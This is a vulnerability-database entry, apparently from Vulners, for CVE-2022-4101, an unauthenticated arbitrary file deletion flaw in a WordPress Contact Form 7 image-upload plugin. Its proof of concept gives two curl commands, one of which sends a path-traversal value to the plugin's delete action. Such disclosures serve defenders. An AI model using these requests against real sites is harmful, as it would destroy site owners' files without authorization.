Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Images Optimize and Upload CF7 <= 2.1.4 - Unauthenticated Arbitrary File Deletion

πŸ—“οΈΒ 21 Dec 2022Β 00:00:00Reported byΒ cydaveTypeΒ 
wpexploit
Β wpexploitπŸ‘Β 89Β Views

Images Optimize and Upload CF7 <= 2.1.4 - Unauthenticated Arbitrary File Deletio

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2022-4101
4 Apr 202518:36
–circl
CNNVD		WordPress plugin Images Optimize and Upload CF7 θ·―εΎ„ιεŽ†ζΌζ΄ž
16 Jan 202300:00
–cnnvd
CVE		CVE-2022-4101
16 Jan 202315:37
–cve
Cvelist		CVE-2022-4101 Images Optimize and Upload CF7 <= 2.1.4 - Unauthenticated Arbitrary File Deletion
16 Jan 202315:37
–cvelist
NVD		CVE-2022-4101
16 Jan 202316:15
–nvd
OSV		CVE-2022-4101
16 Jan 202316:15
–osv
Prion		Path traversal
16 Jan 202316:15
–prion
Positive Technologies		PT-2023-13934 Β· WordPress Β· Images Optimize/Upload Cf7
16 Jan 202300:00
–ptsecurity
RedhatCVE		CVE-2022-4101
23 May 202500:31
–redhatcve
Vulnrichment		CVE-2022-4101 Images Optimize and Upload CF7 <= 2.1.4 - Unauthenticated Arbitrary File Deletion
16 Jan 202315:37
–vulnrichment
Rows per page
1. Install contact-form-7 (dependency)

2. Install the vulnerable plugin (images-optimize-and-upload-cf7 version 2.1.3)

3. Invoke curl to create a potentially missing upload directory (required for the exploit to work):

curl 'https://example.com/wp-admin/admin-ajax.php?action=yr_api_uploader'

4. Invoke the following curl command to delete the delete.me file at the root of the blog:

curl 'https://example.com/wp-admin/admin-ajax.php?action=yr_api_delete' \
    --data 'file=../../../delete.me'

Data

Build on a solid foundation withΒ Vulners data

WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data

Api

Power your application withΒ Vulners API

The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access

App

Assess and manage vulnerabilities withΒ VulnersΒ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Dec 2022 03:23Current
1Low risk
Vulners AI Score1
CVSS 3.19.1
EPSS0.40818
SSVC
wordpresscontact form 7vulnerable pluginfile deletionunauthenticated accesssecurity vulnerabilitydata manipulation
89